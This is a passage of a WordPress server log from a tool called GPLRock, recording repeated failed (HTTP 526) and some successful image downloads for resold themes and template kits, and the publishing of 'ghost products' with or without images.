agrios-agriculture-farming-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agrios---agriculture-farming-wordpress-theme-30969.webp for product agrios-agriculture-farming-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:23:36 UTC] GPLRock: Image download failed for product agrios-agriculture-farming-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:38 UTC] GPLRock: Image download failed for product agrios-agriculture-farming-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agrios---agriculture-farming-wordpress-theme-30969.webp for product agrios-agriculture-farming-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:23:41 UTC] GPLRock WARNING: Image download failed for product agrios-agriculture-farming-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agrios---agriculture-farming-wordpress-theme-30969.webp [04-Apr-2026 06:23:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agrios-agriculture-farming-wordpress-theme [04-Apr-2026 06:23:41 UTC] GPLRock: Image download failed for product tranzlogistics-logistics-cargo-shipping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:43 UTC] GPLRock: Image download failed for product tranzlogistics-logistics-cargo-shipping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tranzlogistics---logistics--cargo-shipping-wordpress-theme-8312.webp for product tranzlogistics-logistics-cargo-shipping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:23:45 UTC] GPLRock: Image download failed for product tranzlogistics-logistics-cargo-shipping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:47 UTC] GPLRock: Image download failed for product tranzlogistics-logistics-cargo-shipping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tranzlogistics---logistics--cargo-shipping-wordpress-theme-8312.webp for product tranzlogistics-logistics-cargo-shipping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:23:49 UTC] GPLRock WARNING: Image download failed for product tranzlogistics-logistics-cargo-shipping-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tranzlogistics---logistics--cargo-shipping-wordpress-theme-8312.webp [04-Apr-2026 06:23:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tranzlogistics-logistics-cargo-shipping-wordpress-theme [04-Apr-2026 06:23:49 UTC] GPLRock: Image download failed for product arki-architecture-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:52 UTC] GPLRock: Image download failed for product arki-architecture-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arki---architecture-wordpress-5306.webp for product arki-architecture-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:23:54 UTC] GPLRock: Image download failed for product arki-architecture-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:56 UTC] GPLRock: Image download failed for product arki-architecture-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arki---architecture-wordpress-5306.webp for product arki-architecture-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:23:58 UTC] GPLRock WARNING: Image download failed for product arki-architecture-wordpress. URL: https://meldwp.com/wp-content/uploads/arki---architecture-wordpress-5306.webp [04-Apr-2026 06:23:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arki-architecture-wordpress [04-Apr-2026 06:23:58 UTC] GPLRock: Image download failed for product babybo-baby-shop-and-children-kids-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:00 UTC] GPLRock: Image download failed for product babybo-baby-shop-and-children-kids-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/babybo---baby-shop-and-children-kids-store-wordpress-theme-7966.webp for product babybo-baby-shop-and-children-kids-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:03 UTC] GPLRock: Image download failed for product babybo-baby-shop-and-children-kids-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:05 UTC] GPLRock: Image download failed for product babybo-baby-shop-and-children-kids-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/babybo---baby-shop-and-children-kids-store-wordpress-theme-7966.webp for product babybo-baby-shop-and-children-kids-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:07 UTC] GPLRock WARNING: Image download failed for product babybo-baby-shop-and-children-kids-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/babybo---baby-shop-and-children-kids-store-wordpress-theme-7966.webp [04-Apr-2026 06:24:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: babybo-baby-shop-and-children-kids-store-wordpress-theme [04-Apr-2026 06:24:07 UTC] GPLRock: Image download failed for product sofbox-software-landing-page-template-html5 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:09 UTC] GPLRock: Image download failed for product sofbox-software-landing-page-template-html5 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sofbox--software-landing-page-template-html5-10101.webp for product sofbox-software-landing-page-template-html5 after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:11 UTC] GPLRock: Image download failed for product sofbox-software-landing-page-template-html5 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:13 UTC] GPLRock: Image download failed for product sofbox-software-landing-page-template-html5 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sofbox--software-landing-page-template-html5-10101.webp for product sofbox-software-landing-page-template-html5 after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:15 UTC] GPLRock WARNING: Image download failed for product sofbox-software-landing-page-template-html5. URL: https://meldwp.com/wp-content/uploads/sofbox--software-landing-page-template-html5-10101.webp [04-Apr-2026 06:24:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sofbox-software-landing-page-template-html5 [04-Apr-2026 06:24:16 UTC] GPLRock: Image downloaded successfully for product clapat-creative-masonry-blog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f54cdb9a.webp [04-Apr-2026 06:24:16 UTC] GPLRock: Using pre-downloaded image for product clapat-creative-masonry-blog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f54cdb9a.webp [04-Apr-2026 06:24:16 UTC] GPLRock: Ghost product published with image - Product ID: clapat-creative-masonry-blog-wordpress-theme [04-Apr-2026 06:24:16 UTC] GPLRock: Image download failed for product look-responsive-multi-purpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:18 UTC] GPLRock: Image download failed for product look-responsive-multi-purpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/look---responsive-multi-purpose-woocommerce-wordpress-theme-6240.webp for product look-responsive-multi-purpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:20 UTC] GPLRock: Image download failed for product look-responsive-multi-purpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:22 UTC] GPLRock: Image download failed for product look-responsive-multi-purpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/look---responsive-multi-purpose-woocommerce-wordpress-theme-6240.webp for product look-responsive-multi-purpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:24 UTC] GPLRock WARNING: Image download failed for product look-responsive-multi-purpose-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/look---responsive-multi-purpose-woocommerce-wordpress-theme-6240.webp [04-Apr-2026 06:24:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: look-responsive-multi-purpose-woocommerce-wordpress-theme [04-Apr-2026 06:24:24 UTC] GPLRock: Image download failed for product vigil-cctv-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:26 UTC] GPLRock: Image download failed for product vigil-cctv-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vigil---cctv-security-wordpress-theme-26342.webp for product vigil-cctv-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:29 UTC] GPLRock: Image download failed for product vigil-cctv-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:31 UTC] GPLRock: Image download failed for product vigil-cctv-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vigil---cctv-security-wordpress-theme-26342.webp for product vigil-cctv-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:33 UTC] GPLRock WARNING: Image download failed for product vigil-cctv-security-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vigil---cctv-security-wordpress-theme-26342.webp [04-Apr-2026 06:24:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vigil-cctv-security-wordpress-theme [04-Apr-2026 06:24:33 UTC] GPLRock: Image download failed for product joss-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:35 UTC] GPLRock: Image download failed for product joss-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/joss---personal-portfolio-wordpress-theme-9803.webp for product joss-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:37 UTC] GPLRock: Image download failed for product joss-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:39 UTC] GPLRock: Image download failed for product joss-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/joss---personal-portfolio-wordpress-theme-9803.webp for product joss-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:41 UTC] GPLRock WARNING: Image download failed for product joss-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/joss---personal-portfolio-wordpress-theme-9803.webp [04-Apr-2026 06:24:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: joss-personal-portfolio-wordpress-theme [04-Apr-2026 06:24:42 UTC] GPLRock: Image download failed for product crptiam-cryptocurrency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:44 UTC] GPLRock: Image download failed for product crptiam-cryptocurrency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crptiam---cryptocurrency-wordpress-theme-11649.webp for product crptiam-cryptocurrency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:46 UTC] GPLRock: Image download failed for product crptiam-cryptocurrency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:48 UTC] GPLRock: Image download failed for product crptiam-cryptocurrency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:24:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crptiam---cryptocurrency-wordpress-theme-11649.webp for product crptiam-cryptocurrency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:24:50 UTC] GPLRock WARNING: Image download failed for product crptiam-cryptocurrency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/crptiam---cryptocurrency-wordpress-theme-11649.webp [04-Apr-2026 06:24:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crptiam-cryptocurrency-wordpress-theme [04-Apr-2026 06:26:21 UTC] GPLRock: Image downloaded successfully for product give-boost-digital-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97f40b70.webp [04-Apr-2026 06:26:21 UTC] GPLRock: Using pre-downloaded image for product give-boost-digital-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97f40b70.webp [04-Apr-2026 06:26:21 UTC] GPLRock: Ghost product published with image - Product ID: give-boost-digital-marketing-agency-elementor-template-kit [04-Apr-2026 06:26:23 UTC] GPLRock: Image downloaded successfully for product geolite-land-surveying-digital-mapping-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4b4e8098.jpg [04-Apr-2026 06:26:23 UTC] GPLRock: Using pre-downloaded image for product geolite-land-surveying-digital-mapping-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4b4e8098.jpg [04-Apr-2026 06:26:23 UTC] GPLRock: Ghost product published with image - Product ID: geolite-land-surveying-digital-mapping-elementor-template-kit [04-Apr-2026 06:26:25 UTC] GPLRock: Image downloaded successfully for product gaudy-dark-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4f8fbf0e.jpg [04-Apr-2026 06:26:25 UTC] GPLRock: Using pre-downloaded image for product gaudy-dark-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4f8fbf0e.jpg [04-Apr-2026 06:26:25 UTC] GPLRock: Ghost product published with image - Product ID: gaudy-dark-digital-agency-elementor-template-kit [04-Apr-2026 06:26:26 UTC] GPLRock: Image downloaded successfully for product gadgetfix-gadget-smartphone-laptop-repair-services-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2e982337.webp [04-Apr-2026 06:26:27 UTC] GPLRock: Using pre-downloaded image for product gadgetfix-gadget-smartphone-laptop-repair-services-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2e982337.webp [04-Apr-2026 06:26:27 UTC] GPLRock: Ghost product published with image - Product ID: gadgetfix-gadget-smartphone-laptop-repair-services-template-kit [04-Apr-2026 06:26:28 UTC] GPLRock: Image downloaded successfully for product fx-movers-moving-storage-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b39ae8a3.webp [04-Apr-2026 06:26:28 UTC] GPLRock: Using pre-downloaded image for product fx-movers-moving-storage-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b39ae8a3.webp [04-Apr-2026 06:26:28 UTC] GPLRock: Ghost product published with image - Product ID: fx-movers-moving-storage-company-elementor-template-kit [04-Apr-2026 06:26:29 UTC] GPLRock: Image downloaded successfully for product fonnia-digital-product-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3604a9f8.webp [04-Apr-2026 06:26:29 UTC] GPLRock: Using pre-downloaded image for product fonnia-digital-product-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3604a9f8.webp [04-Apr-2026 06:26:29 UTC] GPLRock: Ghost product published with image - Product ID: fonnia-digital-product-store-elementor-template-kit [04-Apr-2026 06:26:33 UTC] GPLRock: Image downloaded successfully for product flowtrist-flower-boutique-florist-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d17eddd6.jpg [04-Apr-2026 06:26:33 UTC] GPLRock: Using pre-downloaded image for product flowtrist-flower-boutique-florist-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d17eddd6.jpg [04-Apr-2026 06:26:33 UTC] GPLRock: Ghost product published with image - Product ID: flowtrist-flower-boutique-florist-elementor-template-kit [04-Apr-2026 06:26:34 UTC] GPLRock: Image downloaded successfully for product floury-cake-pastry-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6460f7d5.webp [04-Apr-2026 06:26:34 UTC] GPLRock: Using pre-downloaded image for product floury-cake-pastry-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6460f7d5.webp [04-Apr-2026 06:26:34 UTC] GPLRock: Ghost product published with image - Product ID: floury-cake-pastry-elementor-template-kit [04-Apr-2026 06:26:36 UTC] GPLRock: Image downloaded successfully for product florazo-woocommerce-florist-flower-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-611d635d.webp [04-Apr-2026 06:26:36 UTC] GPLRock: Using pre-downloaded image for product florazo-woocommerce-florist-flower-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-611d635d.webp [04-Apr-2026 06:26:36 UTC] GPLRock: Ghost product published with image - Product ID: florazo-woocommerce-florist-flower-shop-elementor-template-kit [04-Apr-2026 06:26:38 UTC] GPLRock: Image downloaded successfully for product floorsy-flooring-paving-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e40eafbf.jpg [04-Apr-2026 06:26:38 UTC] GPLRock: Using pre-downloaded image for product floorsy-flooring-paving-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e40eafbf.jpg [04-Apr-2026 06:26:38 UTC] GPLRock: Ghost product published with image - Product ID: floorsy-flooring-paving-services-elementor-template-kit [04-Apr-2026 06:45:59 UTC] GPLRock: Image downloaded successfully for product gridzy-responsive-and-justified-image-grid-gallery (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-547f196b.webp [04-Apr-2026 06:45:59 UTC] GPLRock: Using pre-downloaded image for product gridzy-responsive-and-justified-image-grid-gallery: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-547f196b.webp [04-Apr-2026 06:45:59 UTC] GPLRock: Ghost product published with image - Product ID: gridzy-responsive-and-justified-image-grid-gallery [04-Apr-2026 06:46:00 UTC] GPLRock: Image download failed for product aqsatimeline-responsive-wordpress-timeline (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:03 UTC] GPLRock: Image download failed for product aqsatimeline-responsive-wordpress-timeline (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aqsatimeline---responsive-wordpress-timeline-1424.webp for product aqsatimeline-responsive-wordpress-timeline after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:05 UTC] GPLRock: Image download failed for product aqsatimeline-responsive-wordpress-timeline (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:07 UTC] GPLRock: Image download failed for product aqsatimeline-responsive-wordpress-timeline (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aqsatimeline---responsive-wordpress-timeline-1424.webp for product aqsatimeline-responsive-wordpress-timeline after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:09 UTC] GPLRock WARNING: Image download failed for product aqsatimeline-responsive-wordpress-timeline. URL: https://meldwp.com/wp-content/uploads/aqsatimeline---responsive-wordpress-timeline-1424.webp [04-Apr-2026 06:46:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aqsatimeline-responsive-wordpress-timeline [04-Apr-2026 06:46:09 UTC] GPLRock: Image download failed for product bulk-price-editor-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:11 UTC] GPLRock: Image download failed for product bulk-price-editor-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bulk-price-editor-for-woocommerce-32187.webp for product bulk-price-editor-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:14 UTC] GPLRock: Image download failed for product bulk-price-editor-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:16 UTC] GPLRock: Image download failed for product bulk-price-editor-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bulk-price-editor-for-woocommerce-32187.webp for product bulk-price-editor-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:18 UTC] GPLRock WARNING: Image download failed for product bulk-price-editor-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/bulk-price-editor-for-woocommerce-32187.webp [04-Apr-2026 06:46:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bulk-price-editor-for-woocommerce [04-Apr-2026 06:46:18 UTC] GPLRock: Image download failed for product woocommerce-affiliates-boost-your-earnings-with-affiliate-marketing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:20 UTC] GPLRock: Image download failed for product woocommerce-affiliates-boost-your-earnings-with-affiliate-marketing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-affiliates--boost-your-earnings-with-affiliate-marketing-8244.webp for product woocommerce-affiliates-boost-your-earnings-with-affiliate-marketing after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:22 UTC] GPLRock: Image download failed for product woocommerce-affiliates-boost-your-earnings-with-affiliate-marketing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:24 UTC] GPLRock: Image download failed for product woocommerce-affiliates-boost-your-earnings-with-affiliate-marketing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-affiliates--boost-your-earnings-with-affiliate-marketing-8244.webp for product woocommerce-affiliates-boost-your-earnings-with-affiliate-marketing after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:26 UTC] GPLRock WARNING: Image download failed for product woocommerce-affiliates-boost-your-earnings-with-affiliate-marketing. URL: https://meldwp.com/wp-content/uploads/woocommerce-affiliates--boost-your-earnings-with-affiliate-marketing-8244.webp [04-Apr-2026 06:46:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-affiliates-boost-your-earnings-with-affiliate-marketing [04-Apr-2026 06:46:27 UTC] GPLRock: Image download failed for product custom-product-in-woocommerce-order (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:29 UTC] GPLRock: Image download failed for product custom-product-in-woocommerce-order (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-product-in-woocommerce-order-4842.webp for product custom-product-in-woocommerce-order after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:31 UTC] GPLRock: Image download failed for product custom-product-in-woocommerce-order (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:33 UTC] GPLRock: Image download failed for product custom-product-in-woocommerce-order (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-product-in-woocommerce-order-4842.webp for product custom-product-in-woocommerce-order after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:35 UTC] GPLRock WARNING: Image download failed for product custom-product-in-woocommerce-order. URL: https://meldwp.com/wp-content/uploads/custom-product-in-woocommerce-order-4842.webp [04-Apr-2026 06:46:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: custom-product-in-woocommerce-order [04-Apr-2026 06:46:35 UTC] GPLRock: Image downloaded successfully for product legal-assistant-pro-eu-cookie-law-terms-privacy-generator (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f85fe7d6.webp [04-Apr-2026 06:46:35 UTC] GPLRock: Using pre-downloaded image for product legal-assistant-pro-eu-cookie-law-terms-privacy-generator: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f85fe7d6.webp [04-Apr-2026 06:46:35 UTC] GPLRock: Ghost product published with image - Product ID: legal-assistant-pro-eu-cookie-law-terms-privacy-generator [04-Apr-2026 06:46:35 UTC] GPLRock: Image download failed for product fancy-heading-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:37 UTC] GPLRock: Image download failed for product fancy-heading-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fancy-heading-addon-for-elementor-32869.webp for product fancy-heading-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:40 UTC] GPLRock: Image download failed for product fancy-heading-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:42 UTC] GPLRock: Image download failed for product fancy-heading-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fancy-heading-addon-for-elementor-32869.webp for product fancy-heading-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:44 UTC] GPLRock WARNING: Image download failed for product fancy-heading-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/fancy-heading-addon-for-elementor-32869.webp [04-Apr-2026 06:46:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fancy-heading-addon-for-elementor [04-Apr-2026 06:46:44 UTC] GPLRock: Image download failed for product elite-quiz-trivia-quiz-quiz-game-web-version (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:46 UTC] GPLRock: Image download failed for product elite-quiz-trivia-quiz-quiz-game-web-version (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elite-quiz---trivia-quiz--quiz-game---web-version-9659.webp for product elite-quiz-trivia-quiz-quiz-game-web-version after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:48 UTC] GPLRock: Image download failed for product elite-quiz-trivia-quiz-quiz-game-web-version (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:51 UTC] GPLRock: Image download failed for product elite-quiz-trivia-quiz-quiz-game-web-version (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elite-quiz---trivia-quiz--quiz-game---web-version-9659.webp for product elite-quiz-trivia-quiz-quiz-game-web-version after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:53 UTC] GPLRock WARNING: Image download failed for product elite-quiz-trivia-quiz-quiz-game-web-version. URL: https://meldwp.com/wp-content/uploads/elite-quiz---trivia-quiz--quiz-game---web-version-9659.webp [04-Apr-2026 06:46:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elite-quiz-trivia-quiz-quiz-game-web-version [04-Apr-2026 06:46:53 UTC] GPLRock: Image download failed for product secure-pattern-lock-wordpress-security-login-plugin 